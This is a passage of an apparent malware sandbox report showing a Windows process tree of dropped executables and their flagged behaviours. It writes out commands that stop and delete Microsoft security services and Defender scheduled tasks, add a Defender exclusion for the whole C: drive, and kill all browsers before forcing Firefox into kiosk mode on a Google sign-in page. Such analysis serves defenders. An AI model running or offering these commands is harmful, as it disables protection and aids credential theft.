                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                      PID:5976
                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                      reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                        PID:3620
                                                                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                        sc stop "MsSecFlt"
                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                          PID:4528
                                                                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                          sc delete "MsSecFlt"
                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                                                                          PID:4064
                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                          reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                            PID:1092
                                                                                                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                            sc stop "MsSecCore"
                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                                                                            PID:3864
                                                                                                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                            sc delete "MsSecCore"
                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                                                                            PID:2108
                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                            reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                              PID:5436
                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                              schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                PID:1812
                                                                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                  PID:916
                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                  schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                    PID:6040
                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                    schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                      PID:2660
                                                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                      sc stop ddrver
                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                                      PID:2068
                                                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                      sc delete ddrver
                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                        PID:2496
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413350101\772224823d.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10413350101\772224823d.exe"
                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              • Identifies Wine through registry keys
                                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                              PID:5284
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10413350101\772224823d.exe"
                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                • Downloads MZ/PE file
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                PID:3112
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413360101\250ab1997b.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10413360101\250ab1997b.exe"
                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              • Identifies Wine through registry keys
                                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                              PID:4912
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10413360101\250ab1997b.exe"
                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                • Downloads MZ/PE file
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                PID:2884
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413370101\bf63e36e97.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10413370101\bf63e36e97.exe"
                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              • Identifies Wine through registry keys
                                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                              PID:5424
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413380101\d8bc43181b.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10413380101\d8bc43181b.exe"
                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                              • Downloads MZ/PE file
                                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                              PID:748
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Chel3raiO6Ri.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Chel3raiO6Ri.exe"
                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                • Identifies Wine through registry keys
                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                PID:5444
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\1Uk2RJcLqabN.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\1Uk2RJcLqabN.exe"
                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                • Identifies Wine through registry keys
                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                PID:1752
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413390101\8726cdeb67.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10413390101\8726cdeb67.exe"
                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                              PID:6132
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                taskkill /F /IM firefox.exe /T
                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                PID:1000
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                taskkill /F /IM chrome.exe /T
                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                PID:4768
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                taskkill /F /IM msedge.exe /T
                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                PID:3776
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                taskkill /F /IM opera.exe /T
                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                PID:3968
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                taskkill /F /IM brave.exe /T
                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                PID:4884
                                                                                                                                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                  PID:5668
                                                                                                                                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                    • Drops desktop.ini file(s)
                                                                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                    PID:5144
                                                                                                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2008 -prefsLen 27099 -prefMapHandle 2012 -prefMapSize 270279 -ipcHandle 2088 -initialChannelId {e3d24d73-c7f7-45ba-a576-d8f9c3317c30} -parentPid 5144 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5144" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                        PID:216
                                                                                                                                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2496 -prefsLen 27135 -prefMapHandle 2500 -prefMapSize 270279 -ipcHandle 2508 -initialChannelId {0f83d1d0-7175-4230-8876-dd31facdb6be} -parentPid 5144 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5144" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                          PID:4592
                                                                                                                                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3912 -prefsLen 25213 -prefMapHandle 3916 -prefMapSize 270279 -jsInitHandle 3920 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3928 -initialChannelId {4a641b97-5126-4db8-ad85-c45842c455af} -parentPid 5144 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5144" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                                          PID:3060
                                                                                                                                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4128 -prefsLen 27325 -prefMapHandle 4132 -prefMapSize 270279 -ipcHandle 4216 -initialChannelId {ce04f51f-bda9-4c4a-944f-780be32b1c2a} -parentPid 5144 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5144" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                                            PID:4860
                                                                                                                                                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3120 -prefsLen 34824 -prefMapHandle 3208 -prefMapSize 270279 -jsInitHandle 3112 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3184 -initialChannelId {79a513dd-786d-4a5f-a80a-6730bd503363} -parentPid 5144 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5144" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                                            PID:232
                                                                                                                                                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5072 -prefsLen 35012 -prefMapHandle 5076 -prefMapSize 270279 -ipcHandle 5084 -initialChannelId {86f224fd-b16c-43c8-961c-c88df52f1ea5} -parentPid 5144 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5144" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                                            PID:6232
                                                                                                                                                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5420 -prefsLen 32952 -prefMapHandle 5424 -prefMapSize 270279 -jsInitHandle 5428 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5432 -initialChannelId {a51d2570-f891-4619-86ff-95f01cd6d2ff} -parentPid 5144 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5144" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                                            PID:6548
                                                                                                                                                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5604 -prefsLen 32952 -prefMapHandle 5608 -prefMapSize 270279 -jsInitHandle 5612 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5620 -initialChannelId {4d81eab3-7c5e-4a9c-a14e-da7ffbd484c2} -parentPid 5144 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5144" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                                            PID:6560
                                                                                                                                                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5748 -prefsLen 32952 -prefMapHandle 5804 -prefMapSize 270279 -jsInitHandle 5808 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5816 -initialChannelId {68b1a432-72dd-4e4d-bef4-60de30937589} -parentPid 5144 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5144" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                                            PID:6572
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10413400101\6089caffb3.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10413400101\6089caffb3.exe"
                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                      • Modifies Windows Defender DisableAntiSpyware settings
                                                                                                                                                                                                                                      • Modifies Windows Defender Real-time Protection settings
                                                                                                                                                                                                                                      • Modifies Windows Defender TamperProtection settings
                                                                                                                                                                                                                                      • Modifies Windows Defender notification settings
                                                                                                                                                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      • Identifies Wine through registry keys
                                                                                                                                                                                                                                      • Windows security modification
                                                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                      PID:2844
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10413410101\YGYZCmt.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10413410101\YGYZCmt.exe"
                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                      PID:4572
                                                                                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                        PID:100
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10413420101\Rm3cVPI.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10413420101\Rm3cVPI.exe"
                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                      PID:4532
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10413430101\p3hx1_003.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10413430101\p3hx1_003.exe"
                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                      PID:5948
                                                                                                                                                                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                          PID:5576
                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                            PID:5736
                                                                                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                          "C:\Windows\system32\svchost.exe"
                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                          • Downloads MZ/PE file
                                                                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                                                                          PID:856
                                                                                                                                                                                                                                          • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                                                                                                                                                                                                                                            "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                            • Sets service image path in registry
                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                            • Suspicious behavior: LoadsDriver
                                                                                                                                                                                                                                            PID:6744
                                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              powershell Add-MpPreference -ExclusionPath C:\
                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                              PID:12996
                                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              powershell Remove-MpPreference -ExclusionPath C:\
                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                PID:7628
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                              • Deletes itself
                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                              PID:6420
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\{5baf6fe9-5fe1-44d2-9bab-99a8355c991c}\5bb078af.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\{5baf6fe9-5fe1-44d2-9bab-99a8355c991c}\5bb078af.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
                                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                                  PID:9172
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\{2493c9b9-3112-4cae-ac2e-d7f3c9491c8d}\e6ffa05b.exe
                                                                                                                                                                                                                                                    C:/Users/Admin/AppData/Local/Temp/{2493c9b9-3112-4cae-ac2e-d7f3c9491c8d}/\e6ffa05b.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                      PID:9672
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413440101\qWR3lUj.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10413440101\qWR3lUj.exe"
                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                              PID:6188
                                                                                                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                PID:6516
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413450101\TbV75ZR.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10413450101\TbV75ZR.exe"
                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                              PID:2528
                                                                                                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                PID:3500
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3500 -s 504
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                  PID:7404
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10413461121\5ym0ZYg.cmd"
                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                              PID:7504
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10413461121\5ym0ZYg.cmd"
                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                PID:7552
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
